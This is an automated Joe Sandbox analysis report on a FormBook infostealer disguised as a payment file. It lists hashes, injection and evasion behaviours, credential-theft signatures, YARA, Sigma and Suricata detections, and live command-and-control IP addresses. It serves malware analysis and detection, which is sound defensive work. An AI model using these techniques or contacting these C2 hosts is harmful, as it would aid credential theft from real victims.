Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OUTSTANDING BALANCE PAYMENT.exe

Overview

General Information

Sample name:OUTSTANDING BALANCE PAYMENT.exe
Analysis ID:1563620
MD5:07bd00d307952e993352e5311a7fdf90
SHA1:05374cedfe58076e633a5968d2e29b8b5bf98e33
SHA256:50ff8e365c4211b6de55efdb7f73beed523f47eb35b0121ce7ea68c3c0739106
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • OUTSTANDING BALANCE PAYMENT.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 07BD00D307952E993352E5311A7FDF90)
    • svchost.exe (PID: 4776 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QvLFrfAuvuCLc.exe (PID: 2728 cmdline: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 5128 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • QvLFrfAuvuCLc.exe (PID: 4872 cmdline: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , CommandLine: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, NewProcessName: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, OriginalFileName: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 5128, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , ProcessId: 4872, ProcessName: QvLFrfAuvuCLc.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 3420, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 4776, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 3420, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 4776, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-27T08:53:45.960450+010020507451Malware Command and Control Activity Detected192.168.2.649777161.97.168.24580TCP
                2024-11-27T08:54:11.282791+010020507451Malware Command and Control Activity Detected192.168.2.64983827.124.4.24680TCP
                2024-11-27T08:54:47.655968+010020507451Malware Command and Control Activity Detected192.168.2.649878149.88.81.19080TCP
                2024-11-27T08:55:03.326014+010020507451Malware Command and Control Activity Detected192.168.2.64996685.159.66.9380TCP
                2024-11-27T08:55:18.327397+010020507451Malware Command and Control Activity Detected192.168.2.650003185.27.134.14480TCP
                2024-11-27T08:55:33.466810+010020507451Malware Command and Control Activity Detected192.168.2.650009172.67.145.23480TCP
                2024-11-27T08:55:48.702630+010020507451Malware Command and Control Activity Detected192.168.2.650013172.67.167.14680TCP
                2024-11-27T08:56:03.874999+010020507451Malware Command and Control Activity Detected192.168.2.650017154.88.22.10180TCP
                2024-11-27T08:56:18.770935+010020507451Malware Command and Control Activity Detected192.168.2.650022209.74.77.10780TCP
                2024-11-27T08:56:42.065647+010020507451Malware Command and Control Activity Detected192.168.2.650027104.21.34.10380TCP
                2024-11-27T08:56:59.824152+010020507451Malware Command and Control Activity Detected192.168.2.65003120.2.249.780TCP
                2024-11-27T08:57:16.023931+010020507451Malware Command and Control Activity Detected192.168.2.650035156.251.17.22480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-27T08:53:45.960450+010028554651A Network Trojan was detected192.168.2.649777161.97.168.24580TCP
                2024-11-27T08:54:11.282791+010028554651A Network Trojan was detected192.168.2.64983827.124.4.24680TCP
                2024-11-27T08:54:47.655968+010028554651A Network Trojan was detected192.168.2.649878149.88.81.19080TCP
                2024-11-27T08:55:03.326014+010028554651A Network Trojan was detected192.168.2.64996685.159.66.9380TCP
                2024-11-27T08:55:18.327397+010028554651A Network Trojan was detected192.168.2.650003185.27.134.14480TCP
                2024-11-27T08:55:33.466810+010028554651A Network Trojan was detected192.168.2.650009172.67.145.23480TCP
                2024-11-27T08:55:48.702630+010028554651A Network Trojan was detected192.168.2.650013172.67.167.14680TCP
                2024-11-27T08:56:03.874999+010028554651A Network Trojan was detected192.168.2.650017154.88.22.10180TCP
                2024-11-27T08:56:18.770935+010028554651A Network Trojan was detected192.168.2.650022209.74.77.10780TCP
                2024-11-27T08:56:42.065647+010028554651A Network Trojan was detected192.168.2.650027104.21.34.10380TCP
                2024-11-27T08:56:59.824152+010028554651A Network Trojan was detected192.168.2.65003120.2.249.780TCP
                2024-11-27T08:57:16.023931+010028554651A Network Trojan was detected192.168.2.650035156.251.17.22480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-27T08:54:03.235909+010028554641A Network Trojan was detected192.168.2.64981927.124.4.24680TCP
                2024-11-27T08:54:05.907848+010028554641A Network Trojan was detected192.168.2.64982427.124.4.24680TCP
                2024-11-27T08:54:08.595417+010028554641A Network Trojan was detected192.168.2.64983127.124.4.24680TCP
                2024-11-27T08:54:19.223732+010028554641A Network Trojan was detected192.168.2.649858149.88.81.19080TCP
                2024-11-27T08:54:21.892239+010028554641A Network Trojan was detected192.168.2.649865149.88.81.19080TCP
                2024-11-27T08:54:24.564197+010028554641A Network Trojan was detected192.168.2.649872149.88.81.19080TCP
                2024-11-27T08:54:55.411834+010028554641A Network Trojan was detected192.168.2.64994485.159.66.9380TCP
                2024-11-27T08:54:58.079931+010028554641A Network Trojan was detected192.168.2.64995085.159.66.9380TCP
                2024-11-27T08:55:00.751872+010028554641A Network Trojan was detected192.168.2.64995885.159.66.9380TCP
                2024-11-27T08:55:10.226446+010028554641A Network Trojan was detected192.168.2.649983185.27.134.14480TCP
                2024-11-27T08:55:12.937312+010028554641A Network Trojan was detected192.168.2.649990185.27.134.14480TCP
                2024-11-27T08:55:15.611282+010028554641A Network Trojan was detected192.168.2.649997185.27.134.14480TCP
                2024-11-27T08:55:25.329251+010028554641A Network Trojan was detected192.168.2.650006172.67.145.23480TCP
                2024-11-27T08:55:28.178587+010028554641A Network Trojan was detected192.168.2.650007172.67.145.23480TCP
                2024-11-27T08:55:30.870401+010028554641A Network Trojan was detected192.168.2.650008172.67.145.23480TCP
                2024-11-27T08:55:40.464204+010028554641A Network Trojan was detected192.168.2.650010172.67.167.14680TCP
                2024-11-27T08:55:43.124581+010028554641A Network Trojan was detected192.168.2.650011172.67.167.14680TCP
                2024-11-27T08:55:45.948010+010028554641A Network Trojan was detected192.168.2.650012172.67.167.14680TCP
                2024-11-27T08:55:55.802009+010028554641A Network Trojan was detected192.168.2.650014154.88.22.10180TCP
                2024-11-27T08:55:58.471009+010028554641A Network Trojan was detected192.168.2.650015154.88.22.10180TCP
                2024-11-27T08:56:01.142486+010028554641A Network Trojan was detected192.168.2.650016154.88.22.10180TCP
                2024-11-27T08:56:10.717750+010028554641A Network Trojan was detected192.168.2.650019209.74.77.10780TCP
                2024-11-27T08:56:13.425645+010028554641A Network Trojan was detected192.168.2.650020209.74.77.10780TCP
                2024-11-27T08:56:16.168443+010028554641A Network Trojan was detected192.168.2.650021209.74.77.10780TCP
                2024-11-27T08:56:34.006573+010028554641A Network Trojan was detected192.168.2.650023104.21.34.10380TCP
                2024-11-27T08:56:36.721112+010028554641A Network Trojan was detected192.168.2.650025104.21.34.10380TCP
                2024-11-27T08:56:39.338499+010028554641A Network Trojan was detected192.168.2.650026104.21.34.10380TCP
                2024-11-27T08:56:51.697619+010028554641A Network Trojan was detected192.168.2.65002820.2.249.780TCP
                2024-11-27T08:56:54.376808+010028554641A Network Trojan was detected192.168.2.65002920.2.249.780TCP
                2024-11-27T08:56:57.065492+010028554641A Network Trojan was detected192.168.2.65003020.2.249.780TCP
                2024-11-27T08:57:07.048896+010028554641A Network Trojan was detected192.168.2.650032156.251.17.22480TCP
                2024-11-27T08:57:09.720988+010028554641A Network Trojan was detected192.168.2.650033156.251.17.22480TCP
                2024-11-27T08:57:12.400972+010028554641A Network Trojan was detected192.168.2.650034156.251.17.22480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: OUTSTANDING BALANCE PAYMENT.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: OUTSTANDING BALANCE PAYMENT.exeJoe Sandbox ML: detected
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QvLFrfAuvuCLc.exe, 00000004.00000000.2302797977.000000000091E000.00000002.00000001.01000000.00000005.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000000.2455000791.000000000091E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_002C6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_002C60DD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_002C63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002CEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CF56F FindFirstFileW,FindClose,0_2_002CF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002CF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002D1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002D1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002D1F94

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49819 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49824 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49777 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49777 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49858 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49865 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49838 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49838 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49944 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49872 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49950 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49831 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49966 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49966 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50031 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50031 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50035 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50035 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49878 -> 149.88.81.190:80
